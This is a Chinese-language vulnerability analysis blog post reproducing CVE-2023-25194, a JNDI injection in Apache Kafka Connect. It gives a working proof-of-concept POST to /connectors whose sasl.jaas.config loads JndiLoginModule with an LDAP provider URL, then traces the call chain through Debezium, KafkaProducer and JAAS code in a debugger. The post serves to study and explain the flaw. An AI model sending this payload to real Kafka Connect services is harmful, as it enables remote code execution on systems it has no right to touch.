Kafka JNDI注入漏洞分析
2023-9-14 23:5:46 Author: xz.aliyun.com(查看原文) 阅读量:15 收藏

​ 沉迷JNDI注入,看到kafka出现过JNDI注入,复现一波作为学习。首先介绍一个kafka,其项目的目标是为处理实时数据提供一个统一、高吞吐、低延迟的平台。由ScalaJava编写。简单来说就是一个分布式消息队列。一般用来缓存数据。这次复现的漏洞是CVE-2023-25194。影响版本是:2.4.0<=Apache kafka<=3.3.2

​ 直接按照语雀中提供的压缩包,启动即可

./bin/zookeeper-server-start.sh ./config/zookeeper.properties
./bin/kafka-server-start.sh ./config/server.properties
./bin/connect-standalone.sh ./config/connect-standalone.properties ./config/connect-file-source.properties ./config/connect-file-sink.properties

访问自己的http://127.0.0.1:8083/connector-plugins,可以返回红框中的插件就好


使用poc,可以触发计算器,database.password需要填写自己数据库的。

POST /connectors HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Content-Length: 811

{
    "name": "debezium-test-50174",
    "config": {
        "connector.class": "io.debezium.connector.mysql.MySqlConnector",
        "database.hostname": "127.0.0.1",
        "database.port": "3306",
        "database.user": "root",
        "database.password": "Admin@123",
        "database.server.id": "316545017",
        "database.server.name": "test1",
        "database.history.kafka.bootstrap.servers": "127.0.0.1:9092",
        "database.history.kafka.topic": "quickstart-events",    "database.history.producer.security.protocol": "SASL_SSL",
        "database.history.producer.sasl.mechanism": "PLAIN",
        "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://127.0.0.1:1389/xmzgie\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
    }
}

​ 因为是参考了4rain师傅的文章,其中他说到作为connector的入口并不是漏洞的根源,但是本着刨根问底的精神,作为对自己的考验,我还依旧从HTTP请求作为入口进行分析。

​ 既然是要代码审计动态调试也是少不了的,首先是开始debug模式,运行要运行三个Java程序,我们要在运行最后一个的时候开启。这里我先试用vscode打开目录找到bin/kafka-run-class.sh文件。其原本的内容如下


在运行完,这两条指令之后

./bin/zookeeper-server-start.sh ./config/zookeeper.properties
./bin/kafka-server-start.sh ./config/server.properties

在该文件的开头添加一个export KAFKA_DEBUG=2


再执行就会开启一个5005端口的监听。

之后使用idea新建一个空的项目

打开新建的项目中,找到运行kafka的libs目录,并且导入,所有的jar包全部导入

然后新建Remote JVM的过程就不再赘述了,参考链接里有了。

​ 思考一下怎么才能找到程序的入口呢?我这里想到了两种思路

  • HTTP发送给/connectors接口,直接全局去搜索connectors尝试找到。

  • 该漏洞的特点是要新建一个Connector的过程中触发JNDI注入,实测的时候重复发送数据包的话会提示Connector debezium-test-50150 already exists

    • already exists就是关键字特征了,可以全局搜索,我就搜索到了一个AlreadyExistsException.class


下个断点看看呢?成功的可以断住。并且网上翻可以看到一个ConnectorsResource#createConnector完全符合我们要找的方法的特征,这样就定位到了程序的入口。(PS:最好不要点击idea里的下载源代码,这可能会导致bytecode和sourcecode不匹配,然后debug的逻辑就会很混乱)。


这边根据我针对ConnectorsResource#createConnector的调试,怎么都无法走到JNDI注入的位置,其实了解一些kafka中的概念的是知道,他是多线程进行处理的,所以我们发送HTTP的入口并不会直接一条线程就跟到JNDI注入的位置。发送的HTTP请求只是在线程池中新建了一个线程,而真正完成JNDI注入的是在另外一个线程中进行的(应该这样没错吧....说错了麻烦大佬指正,实在是太难了)。根据payload是想要新建一个io.debezium.connector.mysql.MySqlConnector类的连接器。参考一位师傅关于自定义kafka的连接器的文章中写到,如果是SourceConnector应该要拓展SourceTask


io.debezium.connector.common包下就找到了BaseSourceTask这个类,并且这个类还存在start()方法。


并且这里下断点是可以调试到的。终于找到了JNDI注入的入口位置,在BaseSourceTask#start方法中最后会执行到this.coordinator = this.start(config);。这里的this是一个MySqlConnnector


就会跟进到MySqlConnnector#start方法中


在这个方法中存在一行代码

public ChangeEventSourceCoordinator start(Configuration config) {
      //code
      this.schema = new MySqlDatabaseSchema(connectorConfig, valueConverters, topicSelector, schemaNameAdjuster, tableIdCaseInsensitive);
  //跟进这个方法中
      //code
  }

MySqlDatabaseSchema的构造方法中存在super调用了父类的构造方法

public MySqlDatabaseSchema(MySqlConnectorConfig connectorConfig, MySqlValueConverters valueConverter, TopicSelector<TableId> topicSelector, SchemaNameAdjuster schemaNameAdjuster, boolean tableIdCaseInsensitive) {
      super(connectorConfig, topicSelector, connectorConfig.getTableFilters().dataCollectionFilter(), connectorConfig.getColumnFilter(), new TableSchemaBuilder(valueConverter, schemaNameAdjuster, connectorConfig.customConverterRegistry(), connectorConfig.getSourceInfoStructMaker().schema(), connectorConfig.getSanitizeFieldNames()), tableIdCaseInsensitive, connectorConfig.getKeyMapper());
      this.ddlParser = new MySqlAntlrDdlParser(valueConverter, this.getTableFilter());
      this.ddlChanges = this.ddlParser.getDdlChanges();
      this.filters = connectorConfig.getTableFilters();
  }

其父类HistorizedRelationalDatabaseSchema的构造方法代码如下

protected HistorizedRelationalDatabaseSchema(HistorizedRelationalDatabaseConnectorConfig config, TopicSelector<TableId> topicSelector, Tables.TableFilter tableFilter, Tables.ColumnNameFilter columnFilter, TableSchemaBuilder schemaBuilder, boolean tableIdCaseInsensitive, Key.KeyMapper customKeysMapper) {
    super(config, topicSelector, tableFilter, columnFilter, schemaBuilder, tableIdCaseInsensitive, customKeysMapper);
    this.databaseHistory = config.getDatabaseHistory();
    this.databaseHistory.start(); //跟进这个函数
}

会进入到KafkaDatabaseHistory#start


KafkaDatabaseHistory#start函数内容如下

public synchronized void start() {
    super.start();
    if (this.producer == null) {
        this.producer = new KafkaProducer(this.producerConfig.asProperties());
      //跟进到new KafkaProducer
    }
}

new KafkaProducer()代码

public KafkaProducer(Properties properties) {
    this(propsToMap(properties), (Serializer)null, (Serializer)null, (ProducerMetadata)null, (KafkaClient)null, (ProducerInterceptors)null, Time.SYSTEM);
}

这里会执行this()继续跟进

KafkaProducer(Map<String, Object> configs, Serializer<K> keySerializer, Serializer<V> valueSerializer, ProducerMetadata metadata, KafkaClient kafkaClient, ProducerInterceptors interceptors, Time time) {
        //code
        //跟进这个方法
      this.sender = this.newSender(logContext, kafkaClient, this.metadata);
        //code
}

new Sender()构造函数

Sender newSender(LogContext logContext, KafkaClient kafkaClient, ProducerMetadata metadata) {

        //code
    ChannelBuilder channelBuilder = ClientUtils.createChannelBuilder(this.producerConfig, this.time);
    //code
}

跟进createChannelBuilder()方法

public static ChannelBuilder createChannelBuilder(AbstractConfig config, Time time) {
    //code
    return ChannelBuilders.clientChannelBuilder(securityProtocol, Type.CLIENT, config, (ListenerName)null, clientSaslMechanism, time, true);
}

clientChannelBuilder()

public static ChannelBuilder clientChannelBuilder(SecurityProtocol securityProtocol, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, String clientSaslMechanism, Time time, boolean saslHandshakeRequestEnable) {
    //code
    return create(securityProtocol, Mode.CLIENT, contextType, config, listenerName, false, clientSaslMechanism, saslHandshakeRequestEnable, (CredentialCache)null, (DelegationTokenCache)null, time);
}

create()

private static ChannelBuilder create(SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener, String clientSaslMechanism, boolean saslHandshakeRequestEnable, CredentialCache credentialCache, DelegationTokenCache tokenCache, Time time) {
    //code
    ((ChannelBuilder)channelBuilder).configure(configs);
    return (ChannelBuilder)channelBuilder;
}

configure()跟进该方法

public void configure(Map<String, ?> configs) throws KafkaException {
   //code
   LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext)entry.getValue(), mechanism, defaultLoginClass, configs);
   //code
}

acquireLoginManager()

public static LoginManager acquireLoginManager(JaasContext jaasContext, String saslMechanism, Class<? extends Login> defaultLoginClass, Map<String, ?> configs) throws LoginException {
    //code
    loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
    //code
}

跟进到LoginManager的构造函数

private LoginManager(JaasContext jaasContext, String saslMechanism, Map<String, ?> configs, LoginMetadata<?> loginMetadata) throws LoginException {
    //code
    this.login.login();
}

跟进login()

public LoginContext login() throws LoginException {
    //code
    this.loginContext.login();
    log.info("Successfully logged in.");
    return this.loginContext;
}

继续跟进LoginContext#login

public void login() throws LoginException {
        //code
   invokePriv(LOGIN_METHOD);
    //code
}

LoginContext#invokePriv,这里会进入invoke(methodName),而此时methodName的内容是login

private void invokePriv(final String methodName) throws LoginException {
    try {
        java.security.AccessController.doPrivileged
            (new java.security.PrivilegedExceptionAction<Void>() {
            public Void run() throws LoginException {
                invoke(methodName);
                return null;
            }
        }, creatorAcc);
    } catch (java.security.PrivilegedActionException pae) {
        throw (LoginException)pae.getException();
    }
}

于是这里就会执行到LoginContext#invoke,这里会稍微有一些复杂,代码太长就贴图了。这里执行的是methods[mIndex].invoke(moduleStack[i].module, initArgs);


其实就是执行了JndiLoginModule#initialize方法,参数是moduleStack[i].module其中的内容存在user.provider.url。然后会再次回到LoginContext#invoke中会执行到

boolean status = ((Boolean)methods[mIndex].invoke
                (moduleStack[i].module, args)).booleanValue();

那其实就是执行JndiLoginModule#login


查看login函数的代码

public boolean login() throws LoginException {

    //code
    attemptAuthentication(false);          
    //code
}

最后到JndiLoginModule#attemptAuthentication方法中存在漏洞的触发点。

最后贴一张调用栈的截图。

​ 尝试用CodeQL找到这条调用链,还没尝试,好难啊,感觉要长脑子了。

参考链接:

https://www.cnblogs.com/hetianlab/p/17247734.html

https://www.yuque.com/yuqueyonghukcxcby/wwdc80/yntiuyx4a6gnpn1z

https://xz.aliyun.com/t/12602

https://blog.snert.cn/index.php/2023/04/04/cve-2023-25194-kafka-jndi-injection-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://xie.infoq.cn/article/ece8077adf7f6e8aaca047da9

https://segmentfault.com/a/1190000040790524

https://blog.csdn.net/daijiguo/article/details/108754054

http://www.m6000.cn/2061.html

https://blog.csdn.net/feeling890712/article/details/117659285

https://code-monkey.top/2020/03/10/Kafka-Connect%E7%AE%80%E4%BB%8B%E4%B8%8E%E9%83%A8%E7%BD%B2/

http://lihuaxi.xjx100.cn/news/1352399.html?action=onClick

https://articles.zsxq.com/id_52tr00657v3l.html


文章来源: https://xz.aliyun.com/t/12852
如有侵权请联系:admin#unsafe.sh